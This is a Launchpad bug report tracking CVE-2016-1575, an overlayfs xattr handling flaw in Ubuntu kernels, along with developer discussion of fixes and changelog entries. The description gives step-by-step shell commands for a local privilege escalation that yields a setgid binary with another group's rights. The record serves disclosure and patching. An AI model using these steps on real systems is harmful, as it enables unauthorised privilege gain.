CVE-2016-1575

Bug #1534961 reported by halfdog
268
This bug affects 1 person
Affects Status Importance Assigned to Milestone
linux (Ubuntu)
Fix Released
Medium
Unassigned
Precise
Won't Fix
Medium
Unassigned
Trusty
Fix Released
Medium
Unassigned
Vivid
Fix Released
Medium
Unassigned
Wily
Fix Released
Medium
Unassigned
Xenial
Fix Released
Medium
Unassigned
Yakkety
Fix Released
Medium
Unassigned
linux-armadaxp (Ubuntu)
Invalid
Medium
Unassigned
Precise
Won't Fix
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-flo (Ubuntu)
New
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
New
Medium
Unassigned
Xenial
New
Medium
Unassigned
Yakkety
New
Medium
Unassigned
linux-goldfish (Ubuntu)
New
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
New
Medium
Unassigned
Xenial
New
Medium
Unassigned
Yakkety
New
Medium
Unassigned
linux-lts-quantal (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-raring (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-saucy (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-trusty (Ubuntu)
Invalid
Medium
Unassigned
Precise
Fix Released
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-utopic (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Fix Released
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-vivid (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Fix Released
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-wily (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Fix Released
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-lts-xenial (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-mako (Ubuntu)
New
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
New
Medium
Unassigned
Xenial
New
Medium
Unassigned
Yakkety
New
Medium
Unassigned
linux-manta (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
New
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-raspi2 (Ubuntu)
Fix Released
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Fix Released
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-snapdragon (Ubuntu)
Invalid
Medium
Unassigned
Precise
Invalid
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
New
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned
linux-ti-omap4 (Ubuntu)
Invalid
Medium
Unassigned
Precise
Won't Fix
Medium
Unassigned
Trusty
Invalid
Medium
Unassigned
Vivid
Won't Fix
Undecided
Unassigned
Wily
Invalid
Medium
Unassigned
Xenial
Invalid
Medium
Unassigned
Yakkety
Invalid
Medium
Unassigned

Bug Description

On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to gain group privileges of arbitrary groups that created directories with properties to be found using "find / -perm -02020", e.g.

/usr/local/lib/python3.4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail

For Ubuntu Trusty, following sequence can be used to reproduce the problem:

* In user/mount namespace:

rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt

* Outside namespace

setfacl -m d:u:[your unpriv uid]:rwx Test

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

For Ubuntu Wily:

* Inside:

mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt

* Outside:

setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

CreateSetgidBinary is from http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

See also http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ (InvitedOnly/lY9yHKQj) and attached sharing policy.

Revision history for this message
Seth Forshee (sforshee) wrote :

I've tried reproducing this in up-to-date wily and xenial without success. I get to the "chmod 02777 Mnt/mail" step and get EPERM. Perhaps this was fixed by the same commit which fixed the other setattr-related CVE?

Revision history for this message
Seth Forshee (sforshee) wrote :

I did reproduce on trusty.

I tried again on wily/xenial. If I run the steps to completion I do end up with a suid/sgid escalate executable owned by ubuntu:mail, but './Test/mail/escalate /bin/sh' still only gives me a process running as ubuntu:ubuntu.

Revision history for this message
Seth Arnold (seth-arnold) wrote :

You may wish to try a different end executable than the shells; I think they (all? most?) include mitigations against setuid exploits.

Thanks

Revision history for this message
halfdog (halfdog) wrote :

I tried wily with

# apt-cache policy linux-image-4.2.0-25-generic
linux-image-4.2.0-25-generic:
  Installed: 4.2.0-25.30
  Candidate: 4.2.0-25.30
  Version table:
 *** 4.2.0-25.30 0
        500 http://archive.ubuntu.com/ubuntu/ wily-updates/main amd64 Packages
        500 http://archive.ubuntu.com/ubuntu/ wily-security/main amd64 Packages
        100 /var/lib/dpkg/status

And was able to to reproduce. I guess on wily /bin/sh might drop EUID for security reasons, I think bash is doing that.

Revision history for this message
halfdog (halfdog) wrote :
description: updated
Tyler Hicks (tyhicks)
Changed in linux (Ubuntu):
status: New → Incomplete
status: Incomplete → Confirmed
importance: Undecided → High
Revision history for this message
J. R. Okajima (hooanon05) wrote :

FYI

The security bug hunter "halfdog" kindly told me that this problem can reproduce with AUFS.
I've confirmed and fixed. Here is aufs's approach hoping with a little help for overlayfs.

In copy-up, the internal sequence is
- create an entry on the upper writable layer.
- copy the all attributes from the inode on the lower readonly branch.

The essential fix is inserting vfs_removexattr(XATTR_NAME_POSIX_ACL_ACCESS) between them.
For dirs, XATTR_NAME_POSIX_ACL_DEFAULT should be removed too. And then copy the all attributes including XATTRs.
But removing all ACL_ACCESS may cause another problem since some fs (for example, NFS) may want ACL which is equivalent to the permission bits. So just after removing XATTR, posix_acl_chmod() should be called.

Revision history for this message
Seth Forshee (sforshee) wrote : Re: [Bug 1534961] Re: insecure overlayfs xattrs handling in copy_up

On Wed, Feb 17, 2016 at 06:20:57AM -0000, J. R. Okajima wrote:
> FYI
>
> The security bug hunter "halfdog" kindly told me that this problem can reproduce with AUFS.
> I've confirmed and fixed. Here is aufs's approach hoping with a little help for overlayfs.
>
> In copy-up, the internal sequence is
> - create an entry on the upper writable layer.
> - copy the all attributes from the inode on the lower readonly branch.
>
> The essential fix is inserting vfs_removexattr(XATTR_NAME_POSIX_ACL_ACCESS) between them.
> For dirs, XATTR_NAME_POSIX_ACL_DEFAULT should be removed too. And then copy the all attributes including XATTRs.
> But removing all ACL_ACCESS may cause another problem since some fs (for example, NFS) may want ACL which is equivalent to the permission bits. So just after removing XATTR, posix_acl_chmod() should be called.

Does your AUFS fix do this universally? I see no reason to remove the
xattrs if the mount was done by real root.

In Ubuntu an unprivileged user is allowed to mount overlayfs in a user
namespace, and that's where we run into problems as it allows a user to
create files with privileged xattrs or sxid to another user where they
could not have done so otherwise. These patches make it so that the copy
up will fail if the mounter could not have otherwise created the file in
upperdir with those attrs/xattrs.

Your approach is less extreme, but I have a few concerns. First, it
works for xattrs but not for sxid or seemingly for file capabilities
(though I assume it could be extended to do so). Second (and somewhat
related), there are more privileged xattrs than just ACLs (e.g.
trusted.* or security.* for some LSMs) and so it would appear that it
should be extended to filter those as well, but that seems to be
redundant with other checks in the kernel. And finally, this seems to be
inconsistent with standard behavior where setxid/setcap is cleared on
write and not on open.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote : Re: insecure overlayfs xattrs handling in copy_up

This is CVE-2016-1575

Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (43.7 KiB)

This bug was fixed in the package linux - 4.2.0-30.35

---------------
linux (4.2.0-30.35) wily; urgency=low

  [ Seth Forshee ]

  * SAUCE: cred: Add clone_cred() interface
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Use mounter's credentials instead of selectively
    raising caps
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.*
    xattrs
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Be more careful about copying up sxid files
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Propogate nosuid from lower and upper mounts
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576

linux (4.2.0-29.34) wily; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1543167

  [ Brad Figg ]

  * Revert "SAUCE: apparmor: fix sleep from invalid context"
    - LP: #1542049

  [ Upstream Kernel Changes ]

  * Revert "af_unix: Revert 'lock_interruptible' in stream receive code"
    - LP: #1540731

linux (4.2.0-28.33) wily; urgency=low

  [ Brad Figg ]

  * Release Tracking Bug
    - LP: #1540634

  [ Brad Figg ]

  * CONFIG: CONFIG_DEBUG_UART_BCM63XX is not set

  [ J. R. Okajima ]

  * SAUCE: ubuntu: aufs: tiny, extract a new func xino_fwrite_wkq()
    - LP: #1533043
  * SAUCE: ubuntu: aufs: for 4.3, XINO handles EINTR from the dying process
    - LP: #1533043

  [ John Johansen ]

  * SAUCE: (no-up): apparmor: fix for failed mediation of socket that is
    being shutdown
    - LP: #1446906
  * SAUCE: apparmor: fix sleep from invalid context
    - LP: #1539349

  [ Tim Gardner ]

  * [Config] Add pvpanic to virtual flavour
    - LP: #1537923

  [ Upstream Kernel Changes ]

  * Revert "ACPI / LPSS: allow to use specific PM domain during ->probe()"
    - LP: #1540532
  * tools: Add a "make all" rule
    - LP: #1536370
  * vf610_adc: Fix internal temperature calculation
    - LP: #1536370
  * iio: lpc32xx_adc: fix warnings caused by enabling unprepared clock
    - LP: #1536370
  * iio:ad5064: Make sure ad5064_i2c_write() returns 0 on success
    - LP: #1536370
  * iio: ad5064: Fix ad5629/ad5669 shift
    - LP: #1536370
  * iio:ad7793: Fix ad7785 product ID
    - LP: #1536370
  * iio: adc: vf610_adc: Fix division by zero error
    - LP: #1536370
  * mmc: mmc: Improve reliability of mmc_select_hs200()
    - LP: #1536370
  * mmc: mmc: Fix HS setting in mmc_select_hs400()
    - LP: #1536370
  * mmc: mmc: Move mmc_switch_status()
    - LP: #1536370
  * mmc: mmc: Improve reliability of mmc_select_hs400()
    - LP: #1536370
  * crypto: qat - don't use userspace pointer
    - LP: #1536370
  * iio: si7020: Swap data byte order
    - LP: #1536370
  * iio: adc: xilinx: Fix VREFN scale
    - LP: #1536370
  * ipmi: Start the timer and thread on internal msgs
    - LP: #1536370
  * drm/i915: quirk backlight present on Macbook 4, 1
    - LP: #1536370
  * drm/i915: get runtime PM reference around GEM set_caching IOCTL
    - LP: #1536370
  * drm/radeon: Disable uncacheable CPU mappings of GTT with RV6xx
    - LP: #1536370
  *...

Changed in linux (Ubuntu Wily):
status: New → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (12.3 KiB)

This bug was fixed in the package linux - 3.19.0-51.57

---------------
linux (3.19.0-51.57) vivid; urgency=low

  [ Seth Forshee ]

  * SAUCE: cred: Add clone_cred() interface
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Use mounter's credentials instead of selectively
    raising caps
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.*
    xattrs
    - LP: #1531747, #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Be more careful about copying up sxid files
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Propogate nosuid from lower and upper mounts
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576

linux (3.19.0-50.56) vivid; urgency=low

  [ Brad Figg ]

  * Release Tracking Bug
    - LP: #1540576

  [ J. R. Okajima ]

  * SAUCE: ubuntu: aufs: tiny, extract a new func xino_fwrite_wkq()
    - LP: #1533043
  * SAUCE: ubuntu: aufs: for 4.3, XINO handles EINTR from the dying process
    - LP: #1533043

  [ John Johansen ]

  * SAUCE: (no-up): apparmor: fix for failed mediation of socket that is
    being shutdown
    - LP: #1446906

  [ Upstream Kernel Changes ]

  * drivers/base/memory.c: fix kernel warning during memory hotplug on
    ppc64
    - LP: #1463654
  * sched/wait: Fix signal handling in bit wait helpers
    - LP: #1537859
  * sched/wait: Fix the signal handling fix
    - LP: #1537859
  * ARC: Fix silly typo in MAINTAINERS file
    - LP: #1537859
  * ip6mr: call del_timer_sync() in ip6mr_free_table()
    - LP: #1537859
  * gre6: allow to update all parameters via rtnl
    - LP: #1537859
  * atl1c: Improve driver not to do order 4 GFP_ATOMIC allocation
    - LP: #1537859
  * sctp: use the same clock as if sock source timestamps were on
    - LP: #1537859
  * sctp: update the netstamp_needed counter when copying sockets
    - LP: #1537859
  * sctp: also copy sk_tsflags when copying the socket
    - LP: #1537859
  * net: qca_spi: fix transmit queue timeout handling
    - LP: #1537859
  * ipv6: sctp: clone options to avoid use after free
    - LP: #1537859
  * net: add validation for the socket syscall protocol argument
    - LP: #1537859
  * sh_eth: fix kernel oops in skb_put()
    - LP: #1537859
  * net: fix IP early demux races
    - LP: #1537859
  * vlan: Fix untag operations of stacked vlans with REORDER_HEADER off
    - LP: #1537859
  * skbuff: Fix offset error in skb_reorder_vlan_header
    - LP: #1537859
  * pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
    - LP: #1537859
  * bluetooth: Validate socket address length in sco_sock_bind().
    - LP: #1537859
  * fou: clean up socket with kfree_rcu
    - LP: #1537859
  * af_unix: Revert 'lock_interruptible' in stream receive code
    - LP: #1537859
  * KEYS: Fix race between read and revoke
    - LP: #1537859
  * tools: Add a "make all" rule
    - LP: #1537859
  * efi: Disable interrupts around EFI calls, not in the epilog/prolog
    calls
    - LP: #1537859
  * fuse: break infinite loop in fuse_fill_write_pages()
    - LP: #1537859
  * usb: gadget: pxa2...

Changed in linux (Ubuntu Vivid):
status: New → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (9.5 KiB)

This bug was fixed in the package linux - 3.13.0-79.123

---------------
linux (3.13.0-79.123) trusty; urgency=low

  [ Seth Forshee ]

  * SAUCE: cred: Add clone_cred() interface
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Use mounter's credentials instead of full kernel
    credentials
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.*
    xattrs
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Be more careful about copying up sxid files
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576
  * SAUCE: overlayfs: Propogate nosuid from lower and upper mounts
    - LP: #1534961, #1535150
    - CVE-2016-1575 CVE-2016-1576

linux (3.13.0-78.122) trusty; urgency=low

  [ Brad Figg ]

  * Release Tracking Bug
    - LP: #1540559

  [ Eric Dumazet ]

  * SAUCE: (no-up) udp: properly support MSG_PEEK with truncated buffers
    - LP: #1527902

  [ J. R. Okajima ]

  * SAUCE: ubuntu: aufs: tiny, extract a new func xino_fwrite_wkq()
    - LP: #1533043
  * SAUCE: ubuntu: aufs: for 4.3, XINO handles EINTR from the dying process
    - LP: #1533043

  [ Upstream Kernel Changes ]

  * Revert "[stable-only] net: add length argument to
    skb_copy_and_csum_datagram_iovec"
    - LP: #1538756
  * unregister_netdevice : move RTM_DELLINK to until after ndo_uninit
    - LP: #1525324
  * rtnetlink: delay RTM_DELLINK notification until after ndo_uninit()
    - LP: #1525324
  * Drivers: hv: Eliminate the channel spinlock in the callback path
    - LP: #1519897
  * Drivers: hv: vmbus: Implement per-CPU mapping of relid to channel
    - LP: #1519897
  * Drivers: hv: vmbus: Suport an API to send pagebuffers with additional
    control
    - LP: #1519897
  * Drivers: hv: vmbus: Suport an API to send packet with additional
    control
    - LP: #1519897
  * Drivers: hv: vmbus: Export the vmbus_sendpacket_pagebuffer_ctl()
    - LP: #1519897
  * Drivers: hv: vmbus: Fix a siganlling host signalling issue
    - LP: #1519897
  * Drivers: hv: vmbus: Fix a Host signaling bug
    - LP: #1519897
  * ARC: Fix silly typo in MAINTAINERS file
    - LP: #1538756
  * ip6mr: call del_timer_sync() in ip6mr_free_table()
    - LP: #1538756
  * gre6: allow to update all parameters via rtnl
    - LP: #1538756
  * atl1c: Improve driver not to do order 4 GFP_ATOMIC allocation
    - LP: #1538756
  * sctp: use the same clock as if sock source timestamps were on
    - LP: #1538756
  * sctp: update the netstamp_needed counter when copying sockets
    - LP: #1538756
  * ipv6: sctp: clone options to avoid use after free
    - LP: #1538756
  * net: add validation for the socket syscall protocol argument
    - LP: #1538756
  * sh_eth: fix kernel oops in skb_put()
    - LP: #1538756
  * pptp: verify sockaddr_len in pptp_bind() and pptp_connect()
    - LP: #1538756
  * bluetooth: Validate socket address length in sco_sock_bind().
    - LP: #1538756
  * af_unix: Revert 'lock_interruptible' in stream receive code
    - LP: #1538756
  * KEYS: Fix race between read and revoke
    - LP: #1538756
  * tools: Add a "make all" rule
    - LP: #1538...

Read more...

Changed in linux (Ubuntu Trusty):
status: New → Fix Released
Steve Beattie (sbeattie)
information type: Private Security → Public Security
Steve Beattie (sbeattie)
tags: added: kernel-cve-skip-description
Changed in linux-lts-trusty (Ubuntu Precise):
status: New → Fix Released
importance: Undecided → Medium
Steve Beattie (sbeattie)
Changed in linux-lts-trusty (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-trusty (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-trusty (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-wily (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-wily (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-wily (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-wily (Ubuntu Trusty):
status: New → Fix Released
importance: Undecided → Medium
Changed in linux-lts-quantal (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-quantal (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-quantal (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-quantal (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux (Ubuntu Precise):
importance: Undecided → Medium
Changed in linux (Ubuntu Wily):
importance: Undecided → Medium
Changed in linux (Ubuntu Xenial):
importance: High → Medium
Changed in linux (Ubuntu Trusty):
importance: Undecided → Medium
Changed in linux-ti-omap4 (Ubuntu Precise):
importance: Undecided → Medium
Changed in linux-ti-omap4 (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-ti-omap4 (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-ti-omap4 (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-raring (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-raring (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-raring (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-raring (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-armadaxp (Ubuntu Precise):
importance: Undecided → Medium
Changed in linux-armadaxp (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-armadaxp (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-armadaxp (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-xenial (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-xenial (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-xenial (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-xenial (Ubuntu Trusty):
importance: Undecided → Medium
Changed in linux-lts-saucy (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-saucy (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-saucy (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-saucy (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-manta (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-manta (Ubuntu Wily):
importance: Undecided → Medium
Changed in linux-manta (Ubuntu Xenial):
importance: Undecided → Medium
Changed in linux-manta (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-vivid (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-vivid (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-vivid (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-vivid (Ubuntu Trusty):
status: New → Fix Released
importance: Undecided → Medium
Changed in linux-raspi2 (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-raspi2 (Ubuntu Wily):
status: New → Fix Released
importance: Undecided → Medium
Changed in linux-raspi2 (Ubuntu Xenial):
importance: Undecided → Medium
Changed in linux-raspi2 (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-mako (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-mako (Ubuntu Wily):
importance: Undecided → Medium
Changed in linux-mako (Ubuntu Xenial):
importance: Undecided → Medium
Changed in linux-mako (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-utopic (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-utopic (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-utopic (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-lts-utopic (Ubuntu Trusty):
status: New → Fix Released
importance: Undecided → Medium
Changed in linux-goldfish (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-goldfish (Ubuntu Wily):
importance: Undecided → Medium
Changed in linux-goldfish (Ubuntu Xenial):
importance: Undecided → Medium
Changed in linux-goldfish (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-flo (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-flo (Ubuntu Wily):
importance: Undecided → Medium
Changed in linux-flo (Ubuntu Xenial):
importance: Undecided → Medium
Steve Beattie (sbeattie)
Changed in linux-flo (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (10.1 KiB)

This bug was fixed in the package linux - 4.4.0-8.23

---------------
linux (4.4.0-8.23) xenial; urgency=low

  * cgroup namespace mounts broken in containers (LP: #1549398)
    - SAUCE: kernfs: Always set super block owner to init_user_ns

  * 4.4.0-7.22 no longer boots on arm64 (LP: #1547718)
    - arm64: mm: avoid calling apply_to_page_range on empty range
    - UBUNTU SAUCE: arm: mm: avoid calling apply_to_page_range on empty range

  * kernel install failed /bin/cp: cannot stat ‘/boot/initrd.img-4.3.0-7-generic’: No such file or directory (LP: #1536810)
    - [Config] postinst -- handle recreating symlinks when a real file is present

  * insecure overlayfs xattrs handling in copy_up (LP: #1534961)
    - SAUCE: cred: Add clone_cred() interface
    - SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
    - SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
    - SAUCE: overlayfs: Be more careful about copying up sxid files
    - SAUCE: overlayfs: Propogate nosuid from lower and upper mounts

  * overlayfs over fuse should refuse copy_up of files if uid/gid not mapped (LP: #1535150)
    - SAUCE: cred: Add clone_cred() interface
    - SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
    - SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
    - SAUCE: overlayfs: Be more careful about copying up sxid files
    - SAUCE: overlayfs: Propogate nosuid from lower and upper mounts

  * overlay: mkdir fails if directory exists in lowerdir in a user namespace (LP: #1531747)
    - SAUCE: cred: Add clone_cred() interface
    - SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
    - SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs

  * Update Intel ethernet drivers to Fortville SW5 (LP: #1547674)
    - net: bulk free infrastructure for NAPI context, use napi_consume_skb
    - net: Add eth_platform_get_mac_address() helper.
    - i40e: Add mac_filter_element at the end of the list instead of HEAD
    - i40e/i40evf: Fix RSS rx-flow-hash configuration through ethtool
    - i40e: Replace X722 mac check in ethtool get_settings
    - i40evf: allow channel bonding of VFs
    - i40e: define function capabilities in only one place
    - i40evf: null out ring pointers on free
    - i40e: Cleanup the code with respect to restarting autoneg
    - i40e: update features with right offload
    - i40e: bump version to 1.4.10
    - i40e: add new device IDs for X722
    - i40e: Extend ethtool RSS hooks for X722
    - i40e/i40evf: Fix for UDP/TCP RSS for X722
    - i40evf: add new write-back mode
    - i40e/i40evf: Use private workqueue
    - i40e: add new proxy-wol bit for X722
    - i40e: Limit DCB FW version checks to X710/XL710 devices
    - i40e: AQ Add Run PHY Activity struct
    - i40e: AQ Geneve cloud tunnel type
    - i40e: AQ Add external power class to get link status
    - i40e: add 100Mb ethtool reporting
    - ixgbe: bulk free SKBs during TX completion cleanup cycle
    - igb: Remove unnecessary flag setting in igb_set_flag_queue_pairs()
    - igb: Unpair the queues when changing the number of queues...

Changed in linux (Ubuntu Xenial):
status: Confirmed → Fix Released
Steve Beattie (sbeattie)
Changed in linux-lts-xenial (Ubuntu Trusty):
status: New → Invalid
Changed in linux-raspi2 (Ubuntu Xenial):
status: New → Invalid
Steve Beattie (sbeattie)
Changed in linux-manta (Ubuntu Xenial):
status: New → Invalid
Steve Beattie (sbeattie)
Changed in linux-snapdragon (Ubuntu Precise):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-snapdragon (Ubuntu Wily):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-snapdragon (Ubuntu Xenial):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-snapdragon (Ubuntu Yakkety):
status: New → Invalid
importance: Undecided → Medium
Changed in linux-snapdragon (Ubuntu Trusty):
status: New → Invalid
importance: Undecided → Medium
Steve Beattie (sbeattie)
tags: added: kernel-cve-tracking-bug
Mathew Hodson (mhodson)
Changed in linux (Ubuntu Vivid):
importance: Undecided → Medium
Mathew Hodson (mhodson)
summary: - insecure overlayfs xattrs handling in copy_up
+ CVE-2016-1575
Mathew Hodson (mhodson)
Changed in linux (Ubuntu Yakkety):
status: Fix Released → Invalid
Andy Whitcroft (apw)
Changed in linux (Ubuntu Yakkety):
